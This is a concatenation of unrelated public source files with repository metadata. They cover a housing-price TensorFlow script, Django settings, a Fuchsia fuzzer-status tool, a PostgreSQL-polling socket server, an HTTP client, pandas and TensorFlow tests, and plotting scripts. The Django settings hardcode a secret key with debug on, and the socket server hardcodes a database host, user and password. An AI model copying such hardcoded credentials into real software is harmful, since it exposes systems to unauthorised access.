test_path = '/Users/pelin.balci/PycharmProjects/machinelearning/inputs/california_housing_test.csv'
train_path = '/Users/pelin.balci/PycharmProjects/machinelearning/inputs/california_housing_train.csv'
train_df = import_dataset(train_path)
test_df = import_dataset(test_path)
train_df = scale_label(train_df)
test_df = scale_label(test_df)
shuffled_train_df = shuffle_df(train_df)
# Use floating latitude ang longitude vectors seperately:
feature_columns = create_feature_columns()
fp_feature_layer = create_feature_layer(feature_columns)
# Bucketize them intp 10 integer points, we still have two separate vectors:
feature_columns, buckets_feature_layer = create_bucket_features(train_df, resolution_in_degrees)
''' Bucket representation outperformed floating-point representations. '''
# In real life we have two dimension vectors for latitude and longitude, cross them:
feature_cross_feature_layer = create_crossed_feature(feature_columns)
''' Representing these features as a feature cross produced much lower loss values than
representing these features as buckets'''
# Create and compile the model's topography.
my_model = create_model(learning_rate, feature_cross_feature_layer)
# Train the model on the training set.
epochs, rmse = train_model(my_model, train_df, epochs, batch_size, label_name)
plot_the_loss_curve(epochs, rmse)
evaluation_test_result = evaluate_model(my_model, test_df, label_name, batch_size)
print('done')
|
[
"balci.pelin@gmail.com"
] |
balci.pelin@gmail.com
|
22c64eb6e9eab3d47ae40216f2afd52aa7f58a5a
|
1000884faf988644d9abe02525c885307fd36f98
|
/day17/about_md/about_md/settings.py
|
d507ca2e1f90a0399406b7229861aae74f267488
|
[
"MIT"
] |
permissive
|
gengna92/PythonProjects
|
e6f88eb36f636420fbede8e204490c0b3e4c24fc
|
12d223eb1ec8f90992ea87df79f10ea8c745c4cb
|
refs/heads/master
| 2021-08-27T20:48:26.675942
| 2021-08-14T06:59:34
| 2021-08-14T06:59:34
| 166,172,714
| 0
| 0
|
MIT
| 2021-08-14T07:00:08
| 2019-01-17T06:28:52
|
HTML
|
UTF-8
|
Python
| false
| false
| 3,263
|
py
|
"""
Django settings for about_md project.
Generated by 'django-admin startproject' using Django 1.11.20.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'o)btb@#(-2p*my0wc^qa#zj5uj)tf0$6-ox323m)*t3=(5+2ne'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'app01.apps.App01Config',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'app01.my_middleware.middlewares.MD1',
'app01.my_middleware.middlewares.MD2',
]
ROOT_URLCONF = 'about_md.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'about_md.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
|
[
"gengna@new4g.cn"
] |
gengna@new4g.cn
|
f8eccd51f10bf0fadf99e4d474c60d6a0231a31e
|
a782e8b77eb9a32ffb2c3f417125553693eaee86
|
/scripts/fuzzing/check_fuzzer.py
|
bcb62977c4837b69f26a61f593dc9e38d7478b1d
|
[
"BSD-3-Clause"
] |
permissive
|
xyuan/fuchsia
|
9e5251517e88447d3e4df12cf530d2c3068af290
|
db9b631cda844d7f1a1b18cefed832a66f46d56c
|
refs/heads/master
| 2022-06-30T17:53:09.241350
| 2020-05-13T12:28:17
| 2020-05-13T12:28:17
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,737
|
py
|
#!/usr/bin/env python2.7
# Copyright 2019 The Fuchsia Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import sys
from lib.args import ArgParser
from lib.device import Device
from lib.fuzzer import Fuzzer
from lib.host import Host
def main():
parser = ArgParser(
'Reports status for the fuzzer matching NAME if ' +
'provided, or for all running fuzzers. Status includes execution ' +
'state, corpus size, and number of artifacts.')
parser.require_name(False)
args = parser.parse_args()
host = Host.from_build()
device = Device.from_args(host, args)
fuzzers = Fuzzer.filter(host.fuzzers, args.name)
pids = device.getpids()
silent = True
for pkg, tgt in fuzzers:
fuzzer = Fuzzer(device, pkg, tgt)
if not args.name and tgt not in pids:
continue
silent = False
if tgt in pids:
print(str(fuzzer) + ': RUNNING')
else:
print(str(fuzzer) + ': STOPPED')
print(' Output path: ' + fuzzer.data_path())
print(
' Corpus size: %d inputs / %d bytes' % fuzzer.measure_corpus())
artifacts = fuzzer.list_artifacts()
if len(artifacts) == 0:
print(' Artifacts: None')
else:
print(' Artifacts: ' + artifacts[0])
for artifact in artifacts[1:]:
print(' ' + artifact)
if silent:
print(
'No fuzzers are running. Include \'name\' to check specific ' +
'fuzzers.')
return 1
return 0
if __name__ == '__main__':
sys.exit(main())
|
[
"commit-bot@chromium.org"
] |
commit-bot@chromium.org
|
fb5988d10e71565e8e3ad8c771429b17c9cbe261
|
16fa36449c5b7843923ab40fe37e0563b0f811cf
|
/r05.py
|
fe6bda675e4ac8d9443bddda2d5ecdb8a5937750
|
[
"Apache-2.0"
] |
permissive
|
netlabcode/reader
|
1d34787c3d619af4d28c08f989e8c0976f18773a
|
9d42bef6ccb35266abec87db5a2df9bc9d77c355
|
refs/heads/main
| 2023-04-17T08:45:15.397981
| 2021-05-06T05:09:10
| 2021-05-06T05:09:10
| 354,858,950
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,139
|
py
|
import psycopg2
from datetime import datetime
import binascii
import _thread
import time
import socket
PORT1 = 8805
def serverX():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s1:
s1.bind(('',PORT1))
s1.listen()
conn1, addr = s1.accept()
with conn1:
print('Server Substation 5 from:',addr)
conn = psycopg2.connect(host="131.180.165.7",database="CRoF",user="postgres", password="crpg")
cursor = conn.cursor()
#Value id 34-41
cursor.execute('''SELECT value from objects WHERE id=34''')
result = cursor.fetchone()
record1 = result[0]
cursor.execute('''SELECT value from objects WHERE id=35''')
result = cursor.fetchone()
record2 = result[0]
cursor.execute('''SELECT value from objects WHERE id=36''')
result = cursor.fetchone()
record3 = result[0]
cursor.execute('''SELECT value from objects WHERE id=37''')
result = cursor.fetchone()
record4 = result[0]
cursor.execute('''SELECT value from objects WHERE id=38''')
result = cursor.fetchone()
record5 = result[0]
cursor.execute('''SELECT value from objects WHERE id=39''')
result = cursor.fetchone()
record6 = result[0]
cursor.execute('''SELECT value from objects WHERE id=40''')
result = cursor.fetchone()
record7 = result[0]
cursor.execute('''SELECT value from objects WHERE id=41''')
result = cursor.fetchone()
record8 = result[0]
#Value code
cursor.execute('''SELECT code from objects WHERE id=34''')
result = cursor.fetchone()
r1 = result[0]
cursor.execute('''SELECT code from objects WHERE id=35''')
result = cursor.fetchone()
r2 = result[0]
cursor.execute('''SELECT code from objects WHERE id=36''')
result = cursor.fetchone()
r3 = result[0]
cursor.execute('''SELECT code from objects WHERE id=37''')
result = cursor.fetchone()
r4 = result[0]
cursor.execute('''SELECT code from objects WHERE id=38''')
result = cursor.fetchone()
r5 = result[0]
cursor.execute('''SELECT code from objects WHERE id=39''')
result = cursor.fetchone()
r6 = result[0]
cursor.execute('''SELECT code from objects WHERE id=40''')
result = cursor.fetchone()
r7 = result[0]
cursor.execute('''SELECT code from objects WHERE id=41''')
result = cursor.fetchone()
r8 = result[0]
while True:
data = "a"
dataxy = data.encode()
try:
#Format: mu01_id+value
cursor.execute('''SELECT value from objects WHERE id=34''')
result = cursor.fetchone()
if record1 != result[0]:
print(result[0])
string = "mu01_"+str(r1)+"+"+str(result[0])
datax = string.encode()
conn1.sendall(datax)
print(string)
record1 = result[0]
cursor.execute('''SELECT value from objects WHERE id=35''')
result = cursor.fetchone()
if record2 != result[0]:
print(result[0])
string = "mu01_"+str(r2)+"+"+str(result[0])
datax = string.encode()
conn1.sendall(datax)
print(string)
record2 = result[0]
cursor.execute('''SELECT value from objects WHERE id=36''')
result = cursor.fetchone()
if record3 != result[0]:
print(result[0])
string = "mu02_"+str(r3)+"+"+str(result[0])
datax = string.encode()
conn1.sendall(datax)
print(string)
record3 = result[0]
cursor.execute('''SELECT value from objects WHERE id=37''')
result = cursor.fetchone()
if record4 != result[0]:
print(result[0])
string = "mu02_"+str(r4)+"+"+str(result[0])
datax = string.encode()
conn1.sendall(datax)
print(string)
record4 = result[0]
cursor.execute('''SELECT value from objects WHERE id=38''')
result = cursor.fetchone()
if record5 != result[0]:
print(result[0])
string = "mu02_"+str(r5)+"+"+str(result[0])
datax = string.encode()
conn1.sendall(datax)
print(string)
record5 = result[0]
cursor.execute('''SELECT value from objects WHERE id=39''')
result = cursor.fetchone()
if record6 != result[0]:
print(result[0])
string = "mu05_"+str(r6)+"+"+str(result[0])
datax = string.encode()
conn1.sendall(datax)
print(string)
record6 = result[0]
cursor.execute('''SELECT value from objects WHERE id=40''')
result = cursor.fetchone()
if record7 != result[0]:
print(result[0])
string = "mu03_"+str(r7)+"+"+str(result[0])
datax = string.encode()
conn1.sendall(datax)
print(string)
record7 = result[0]
cursor.execute('''SELECT value from objects WHERE id=41''')
result = cursor.fetchone()
if record8 != result[0]:
print(result[0])
string = "mu03_"+str(r8)+"+"+str(result[0])
datax = string.encode()
conn1.sendall(datax)
print(string)
record8 = result[0]
conn1.sendall(dataxy)
#print(record1)
time.sleep(1)
except:
conn1.close()
conn.close()
print("Connection Close Substation 5")
break
conn1.close()
print("Restart Server Substation 6")
conn.close()
s1.close()
time.sleep(1)
serverX()
serverX()
|
[
"noreply@github.com"
] |
netlabcode.noreply@github.com
|
9953913a4f3c4ad0d5c3c64721526baac7fcac32
|
0f0530b06a59fe6cfaa74b0030d892256e33c666
|
/aioworkers/net/web/client.py
|
2734c1f7df6ac6cc16ae2630104baf89ad73f93e
|
[
"Apache-2.0"
] |
permissive
|
nicoddemus/aioworkers
|
c269b470be5be0c2a59fb2a91d3a285f54125735
|
4ab85064844dc28141833d1348989d8c891f3d7d
|
refs/heads/master
| 2022-12-06T21:22:29.976784
| 2020-08-22T11:42:53
| 2020-08-22T11:43:24
| 291,555,920
| 0
| 0
|
Apache-2.0
| 2020-08-30T21:37:29
| 2020-08-30T21:37:28
| null |
UTF-8
|
Python
| false
| false
| 3,021
|
py
|
import logging
import urllib.error
import urllib.request
from http.client import HTTPResponse
from typing import Any, Awaitable, Callable, Mapping, Optional, Tuple, Union
from aioworkers.core.base import ExecutorEntity
from aioworkers.http import URL
logger = logging.getLogger(__name__)
class Request:
def __init__(self, session: 'Session', *args, **kwargs):
self._session = session
self._request = urllib.request.Request(*args, **kwargs)
self._response = None # type: Optional[Response]
async def __aenter__(self) -> 'Response':
logger.info('Request %r', self._request)
try:
response = await self._session.run(
self._session.opener.open, self._request,
)
except urllib.error.HTTPError as e:
response = e
logger.info('Response %r', response)
self._response = Response(response, self._session)
return self._response
async def __aexit__(self, exc_type, exc_val, exc_tb):
await self._response.close()
class Response:
def __init__(
self, response: HTTPResponse,
session: 'Session',
):
self._response = response
self._session = session
@property
def status(self):
return self._response.status
@property
def reason(self):
return self._response.reason
@property
def headers(self):
return self._response.headers
async def read(self) -> bytes:
return await self._session.run(self._response.read)
def isclosed(self):
return self._response.isclosed()
async def close(self):
return await self._session.run(self._response.close)
class Session:
def __init__(
self,
runner: Callable[..., Awaitable[Any]],
headers: Mapping = None,
conn_timeout: float = 60,
read_timeout: float = 60,
handlers: Optional[Tuple[urllib.request.BaseHandler]] = None,
):
self.run = runner
self._headers = headers
self._conn_timeout = conn_timeout
self._read_timeout = read_timeout
if handlers is None:
handlers = (
urllib.request.HTTPCookieProcessor(),
)
self.opener = urllib.request.build_opener(*handlers)
if headers:
if isinstance(headers, Mapping):
self.opener.addheaders = list(headers.items())
else:
self.opener.addheaders = list(headers)
@classmethod
def from_entity(cls, entity: ExecutorEntity, **kwargs) -> 'Session':
kwargs.update(
runner=entity.run_in_executor,
)
return cls(**kwargs)
def request(self, url: Union[str, URL], method='get', **kwargs) -> Request:
if isinstance(url, URL):
url = str(url)
kwargs.update(
url=url,
method=method.upper(),
)
return Request(self, **kwargs)
async def close(self):
self.opener.close()
|
[
"yttrium@somedev.ru"
] |
yttrium@somedev.ru
|
c38a71aa6745843566b5e5e68584da67b3d9b12f
|
1ba8794a7e38c19fda1cf3a02a4e55004a4f99ec
|
/pandas/tests/scalar/test_na_scalar.py
|
e68e49814245f91df964719c373d4f4943563f87
|
[
"BSD-3-Clause"
] |
permissive
|
souravs17031999/pandas
|
51003c705c12f2f78d6c264c4333aabf5da7d312
|
8cdbebd6be92d317e0d21679c5891a10dbf8efe7
|
refs/heads/master
| 2020-09-24T13:46:40.314995
| 2019-12-04T05:40:28
| 2019-12-04T05:40:28
| 225,654,387
| 1
| 0
|
BSD-3-Clause
| 2019-12-04T03:13:02
| 2019-12-03T15:33:22
|
Python
|
UTF-8
|
Python
| false
| false
| 2,751
|
py
|
import numpy as np
import pytest
from pandas._libs.missing import NA
from pandas.core.dtypes.common import is_scalar
import pandas as pd
import pandas.util.testing as tm
def test_singleton():
assert NA is NA
new_NA = type(NA)()
assert new_NA is NA
def test_repr():
assert repr(NA) == "NA"
assert str(NA) == "NA"
def test_truthiness():
with pytest.raises(TypeError):
bool(NA)
with pytest.raises(TypeError):
not NA
def test_hashable():
assert hash(NA) == hash(NA)
d = {NA: "test"}
assert d[NA] == "test"
def test_arithmetic_ops(all_arithmetic_functions):
op = all_arithmetic_functions
for other in [NA, 1, 1.0, "a", np.int64(1), np.nan]:
if op.__name__ == "rmod" and isinstance(other, str):
continue
if op.__name__ in ("divmod", "rdivmod"):
assert op(NA, other) is (NA, NA)
else:
assert op(NA, other) is NA
def test_comparison_ops():
for other in [NA, 1, 1.0, "a", np.int64(1), np.nan]:
assert (NA == other) is NA
assert (NA != other) is NA
assert (NA > other) is NA
assert (NA >= other) is NA
assert (NA < other) is NA
assert (NA <= other) is NA
if isinstance(other, np.int64):
# for numpy scalars we get a deprecation warning and False as result
# for equality or error for larger/lesser than
continue
assert (other == NA) is NA
assert (other != NA) is NA
assert (other > NA) is NA
assert (other >= NA) is NA
assert (other < NA) is NA
assert (other <= NA) is NA
def test_unary_ops():
assert +NA is NA
assert -NA is NA
assert abs(NA) is NA
assert ~NA is NA
def test_logical_and():
assert NA & True is NA
assert True & NA is NA
assert NA & False is False
assert False & NA is False
assert NA & NA is NA
with pytest.raises(TypeError):
NA & 5
def test_logical_or():
assert NA | True is True
assert True | NA is True
assert NA | False is NA
assert False | NA is NA
assert NA | NA is NA
with pytest.raises(TypeError):
NA | 5
def test_logical_xor():
assert NA ^ True is NA
assert True ^ NA is NA
assert NA ^ False is NA
assert False ^ NA is NA
assert NA ^ NA is NA
with pytest.raises(TypeError):
NA ^ 5
def test_logical_not():
assert ~NA is NA
def test_is_scalar():
assert is_scalar(NA) is True
def test_isna():
assert pd.isna(NA) is True
assert pd.notna(NA) is False
def test_series_isna():
s = pd.Series([1, NA], dtype=object)
expected = pd.Series([False, True])
tm.assert_series_equal(s.isna(), expected)
|
[
"jeff@reback.net"
] |
jeff@reback.net
|
d933617badf4c3b39e324ad69a7ee50c2c10378b
|
5496b9682dec06925f3572e64d7f1eb48d78ebe1
|
/src/advection_scenarios/create_grid_spacing.py
|
ab9a14e171f5c9db216a14e05f9a775bf97de885
|
[] |
no_license
|
VictorOnink/Lagrangian-Transport-Scenarios
|
64bec8b992e2909a05b0258524dbae25f967ea29
|
586bcecc42d6a7f4f299507da8f0cb29c8d71a2e
|
refs/heads/master
| 2023-04-14T12:22:29.309172
| 2022-07-11T18:46:38
| 2022-07-11T18:46:38
| 297,894,637
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,595
|
py
|
import settings
import utils
import numpy as np
import xarray
import progressbar
def create_grid_spacing(output_name: str, grid: np.array, lon: np.array, lat: np.array):
grid_lon_spacing = np.zeros(grid.shape)
grid_lat_spacing = np.zeros(grid.shape)
for lat_step in progressbar.progressbar(range(grid.shape[0] - 1)):
for lon_step in range(grid.shape[1] - 1):
grid_lon_spacing[lat_step, lon_step] = np.abs(lon[lon_step] - lon[lon_step + 1])
grid_lat_spacing[lat_step, lon_step] = np.abs(lat[lat_step] - lat[lat_step + 1])
grid_lon_spacing = fill_last(grid_lon_spacing)
grid_lat_spacing = fill_last(grid_lat_spacing)
# Saving the entire grid spacing fields
coords = [('time', np.array([0])), ('lat', lat), ('lon', lon)]
lon_space = xarray.DataArray(grid_lon_spacing[np.newaxis, :, :], coords=coords)
lat_space = xarray.DataArray(grid_lat_spacing[np.newaxis, :, :], coords=coords)
dcoo = {'time': np.array([0]), 'lat': lat, 'lon': lon}
dset = xarray.Dataset({'lon_spacing': lon_space, 'lat_spacing': lat_space}, coords=dcoo)
dset.to_netcdf(output_name)
# Checks to see if the grid spacing calculation works as expected
utils.print_statement("The maximum lon spacing is {}, and the minimum is {}".format(grid_lon_spacing.max(), grid_lon_spacing.min()))
utils.print_statement("The maximum lat spacing is {}, and the minimum is {}".format(grid_lat_spacing.max(), grid_lat_spacing.min()))
def fill_last(array: np.array):
array[:, -1] = array[:, -2]
array[-1, :] = array[-2, :]
return array
|
[
"31734765+VictorOnink@users.noreply.github.com"
] |
31734765+VictorOnink@users.noreply.github.com
|
8475480405ab57c758c966b738b679c6d1f6aef0
|
b9e99a828952ffeab9767e625c0061cb3ea5b670
|
/Python编程从入门到实践/data_visual/csv_test/highs_lows.py
|
2d91031ecfd543481f909f68a6c6648d8d98b679
|
[] |
no_license
|
ZGA101421/Python3_Project
|
95d95e23858ef92f6825f018605089c105303ad3
|
fa30f876fd13890743bc81d1521534c340575132
|
refs/heads/master
| 2022-04-03T07:03:46.369710
| 2019-12-30T15:22:21
| 2019-12-30T15:22:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,117
|
py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
@File : highs_lows.py
@Time : 2019/04/06 22:32:59
@Author : leacoder
@Version : 1.0
@Contact : leacock1991@gmail.com
@License :
@Desc : 处理CSV文件数据,matplotlib绘制最高温度最低温度折线图
'''
# here put the import lib
# c sv 模块包含在Python标准库中
import csv
from matplotlib import pyplot as plt
# 模块datetime 处理日期
from datetime import datetime
# 从文件中获取日期、 最高气温和最低气温
filename = 'death_valley_2014.csv'
with open(filename) as f:
# 创建一个与该文件相关联的阅读器(reader ) 对象
reader = csv.reader(f)
# 模块csv 包含函数next() , 调用它并将阅读器对象传递给它时, 它将返回文件中的下一行。 在前面的代码中, 我们只调用了next() 一次, 因此得到的是文件的第一行, 其中包含文件头
header_row = next(reader)
dates, highs, lows = [], [], []
for row in reader: # 遍历文件中余下的各行
try: # 错误检查
current_date = datetime.strptime(row[0], "%Y-%m-%d") # '2014-7-1
high = int(row[1])
low = int(row[3])
except ValueError:
print(current_date, 'missing data')
else:
dates.append(current_date)
highs.append(high)
lows.append(low)
# 根据数据绘制图形
fig = plt.figure(dpi=123, figsize=(10, 6))
'''
plot(*args[, scalex, scaley, data])
Plot y versus x as lines and/or markers.
alpha: float Set the alpha value used for blending - not supported on all backends.
'''
plt.plot(dates, highs, c='red', alpha=0.5) # 绘制最高温度
plt.plot(dates, lows, c='blue', alpha=0.5) # 绘制最低温度
'''
fill_between(x, y1[, y2, where, ...])
Fill the area between two horizontal curves.
'''
plt.fill_between(dates, highs, lows, facecolor='blue', alpha=0.1)
# 设置图形的格式
plt.title("Daily high temperatures - 2014", fontsize=24)
plt.xlabel('', fontsize=16)
'''
autofmt_xdate(self, bottom=0.2, rotation=30, ha='right', which=None)
Date ticklabels often overlap, so it is useful to rotate them and right align them.
bottom : scalar
The bottom of the subplots for subplots_adjust().
rotation : angle in degrees
The rotation of the xtick labels.
ha : string
The horizontal alignment of the xticklabels.
which : {None, 'major', 'minor', 'both'}
Selects which ticklabels to rotate. Default is None which works the same as major.
'''
fig.autofmt_xdate()
title = "Daily high and low temperatures - 2014\nDeath Valley, CA"
plt.title(title, fontsize=24)
'''
tick_params([axis])
Change the appearance of ticks, tick labels, and gridlines. 更改刻度,刻度标签和网格线的外观
axis : {'x', 'y', 'both'}, optional
Which axis to apply the parameters to.
which : {'major', 'minor', 'both'}
Default is 'major'; apply arguments to which ticks.
'''
plt.tick_params(axis='both', which='major', labelsize=16)
plt.show()
|
[
"986740304@qq.com"
] |
986740304@qq.com
|
5f939ea970bddbb00c0137ac68aa23127fa09de8
|
affe80fe068100199dcf64e16c305d1e2b8ca0bf
|
/official/modeling/progressive/train_lib_test.py
|
a64b6da3fd504b3c60317df44a150dc891cb416b
|
[
"Apache-2.0"
] |
permissive
|
farshbafdoustar/models
|
2c8c474e2e6f0bb38e1679282e8b64c39f58d3b1
|
3a2e407ce3871551b0074bcf10a0d6ee180bbdb2
|
refs/heads/master
| 2023-01-31T19:11:23.084582
| 2020-12-19T09:26:44
| 2020-12-19T09:26:44
| 322,809,980
| 0
| 0
|
Apache-2.0
| 2020-12-19T09:27:09
| 2020-12-19T09:22:00
|
Python
|
UTF-8
|
Python
| false
| false
| 5,807
|
py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the progressive train_lib."""
import os
from absl import flags
from absl.testing import parameterized
import dataclasses
import orbit
import tensorflow as tf
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import strategy_combinations
from official.common import flags as tfm_flags
# pylint: disable=unused-import
from official.common import registry_imports
# pylint: enable=unused-import
from official.core import config_definitions as cfg
from official.core import task_factory
from official.modeling import optimization
from official.modeling.hyperparams import params_dict
from official.modeling.progressive import policies
from official.modeling.progressive import train_lib
from official.modeling.progressive import trainer as prog_trainer_lib
from official.utils.testing import mock_task
FLAGS = flags.FLAGS
tfm_flags.define_flags()
@dataclasses.dataclass
class ProgTaskConfig(cfg.TaskConfig):
pass
@task_factory.register_task_cls(ProgTaskConfig)
class ProgMockTask(policies.ProgressivePolicy, mock_task.MockTask):
"""Progressive task for testing."""
def __init__(self, params: cfg.TaskConfig, logging_dir: str = None):
mock_task.MockTask.__init__(
self, params=params, logging_dir=logging_dir)
policies.ProgressivePolicy.__init__(self)
def num_stages(self):
return 2
def num_steps(self, stage_id):
return 2 if stage_id == 0 else 4
def get_model(self, stage_id, old_model=None):
del stage_id, old_model
return self.build_model()
def get_optimizer(self, stage_id):
"""Build optimizer for each stage."""
params = optimization.OptimizationConfig({
'optimizer': {
'type': 'adamw',
},
'learning_rate': {
'type': 'polynomial',
'polynomial': {
'initial_learning_rate': 0.01,
'end_learning_rate': 0.0,
'power': 1.0,
'decay_steps': 10,
},
},
'warmup': {
'polynomial': {
'power': 1,
'warmup_steps': 2,
},
'type': 'polynomial',
}
})
opt_factory = optimization.OptimizerFactory(params)
optimizer = opt_factory.build_optimizer(opt_factory.build_learning_rate())
return optimizer
def get_train_dataset(self, stage_id):
del stage_id
strategy = tf.distribute.get_strategy()
return orbit.utils.make_distributed_dataset(
strategy, self.build_inputs, None)
def get_eval_dataset(self, stage_id):
del stage_id
strategy = tf.distribute.get_strategy()
return orbit.utils.make_distributed_dataset(
strategy, self.build_inputs, None)
class TrainTest(tf.test.TestCase, parameterized.TestCase):
def setUp(self):
super(TrainTest, self).setUp()
self._test_config = {
'trainer': {
'checkpoint_interval': 10,
'steps_per_loop': 10,
'summary_interval': 10,
'train_steps': 10,
'validation_steps': 5,
'validation_interval': 10,
'continuous_eval_timeout': 1,
'optimizer_config': {
'optimizer': {
'type': 'sgd',
},
'learning_rate': {
'type': 'constant'
}
}
},
}
@combinations.generate(
combinations.combine(
distribution_strategy=[
strategy_combinations.default_strategy,
strategy_combinations.cloud_tpu_strategy,
strategy_combinations.one_device_strategy_gpu,
],
mode='eager',
flag_mode=['train', 'eval', 'train_and_eval'],
run_post_eval=[True, False]))
def test_end_to_end(self, distribution_strategy, flag_mode, run_post_eval):
model_dir = self.get_temp_dir()
experiment_config = cfg.ExperimentConfig(
trainer=prog_trainer_lib.ProgressiveTrainerConfig(),
task=ProgTaskConfig())
experiment_config = params_dict.override_params_dict(
experiment_config, self._test_config, is_strict=False)
with distribution_strategy.scope():
task = task_factory.get_task(experiment_config.task,
logging_dir=model_dir)
_, logs = train_lib.run_experiment(
distribution_strategy=distribution_strategy,
task=task,
mode=flag_mode,
params=experiment_config,
model_dir=model_dir,
run_post_eval=run_post_eval)
if run_post_eval:
self.assertNotEmpty(logs)
else:
self.assertEmpty(logs)
if flag_mode == 'eval':
return
self.assertNotEmpty(
tf.io.gfile.glob(os.path.join(model_dir, 'checkpoint')))
# Tests continuous evaluation.
_, logs = train_lib.run_experiment(
distribution_strategy=distribution_strategy,
task=task,
mode='continuous_eval',
params=experiment_config,
model_dir=model_dir,
run_post_eval=run_post_eval)
print(logs)
if __name__ == '__main__':
tf.test.main()
|
[
"gardener@tensorflow.org"
] |
gardener@tensorflow.org
|
d90e9983e678c614e1ad4d95be16bb3c39cb1ccb
|
6ccb55befcbc69caa351b8337fdd40e55dbb802f
|
/venv/bin/update-tld-names
|
f14760f6fbf606e71bb165ba44b46f3f3723847d
|
[] |
no_license
|
FiacreT/M-moire
|
cc0791cbf98bf565ea637e6ec409611bcc596c57
|
4089755191ffc848614247e98bbb641c1933450d
|
refs/heads/master
| 2022-12-12T21:55:23.679854
| 2019-09-06T23:28:03
| 2019-09-06T23:28:03
| 187,702,532
| 2
| 2
| null | 2022-12-08T01:04:58
| 2019-05-20T19:39:21
|
Python
|
UTF-8
|
Python
| false
| false
| 192
|
#!/home/fiacre/Python-Project/datasploit-master/venv/bin/python2
# We should have absolute imports here
from tld.commands.update_tld_names import main
if __name__ == "__main__":
main()
|
[
"hervesoubgui57@gmail.com"
] |
hervesoubgui57@gmail.com
|
|
c8d425241dc48565765bc90cd2afed9745c89bb4
|
ddb185b0cf581d85a1dd733a6d1e5d027ba3e0ca
|
/phase1/993.py
|
9933eaf67c3581eb880d47702addd2ff933ea70c
|
[] |
no_license
|
GavinPHR/code
|
8a319e1223a307e755211b7e9b34c5abb00b556b
|
b1d8d49633db362bbab246c0cd4bd28305964b57
|
refs/heads/master
| 2020-05-16T04:09:19.026207
| 2020-04-30T10:00:06
| 2020-04-30T10:00:06
| 182,766,600
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 937
|
py
|
# Cousins in Binary Tree
from binarytree import TreeNode, makeTree
import collections
class Solution:
def isCousins(self, root: TreeNode, x: int, y: int) -> bool:
if root.val == x or root.val == y:
return False
def re(root, val, level):
if not root:
return
if root.left and root.left.val == val:
return (level + 1, root.val)
if root.right and root.right.val == val:
return (level + 1, root.val)
l = re(root.left, val, level + 1)
r = re(root.right, val, level + 1)
return l if l else r
a = re(root, x, 0)
b = re(root, y, 0)
if a[0] != b[0]:
return False
if a[1] == b[1]:
return False
return True
if __name__ == '__main__':
root = makeTree([1,2,3,None,4,None,5])
s = Solution()
print(s.isCousins(root, 4, 5))
|
[
"gavinsweden@gmail.com"
] |
gavinsweden@gmail.com
|
ff7d9e4d8bf6c338b93d2ca521b0c02ba9e27b95
|
109d501eeb83981c058bf1e01f10c7851f3866b5
|
/people/forms.py
|
22d0e3360774fbe291e21dbe27ebd94aaac1f2fb
|
[] |
no_license
|
alikhundmiri/revenue_source_directory
|
028f8164d7a6a5d62f24b1a0214664718c866291
|
636311269557352d901e47f847b044dc2a7545dc
|
refs/heads/master
| 2022-12-16T20:51:44.327649
| 2018-09-24T13:50:17
| 2018-09-24T13:50:17
| 137,063,499
| 0
| 0
| null | 2022-12-08T02:14:33
| 2018-06-12T11:43:40
|
JavaScript
|
UTF-8
|
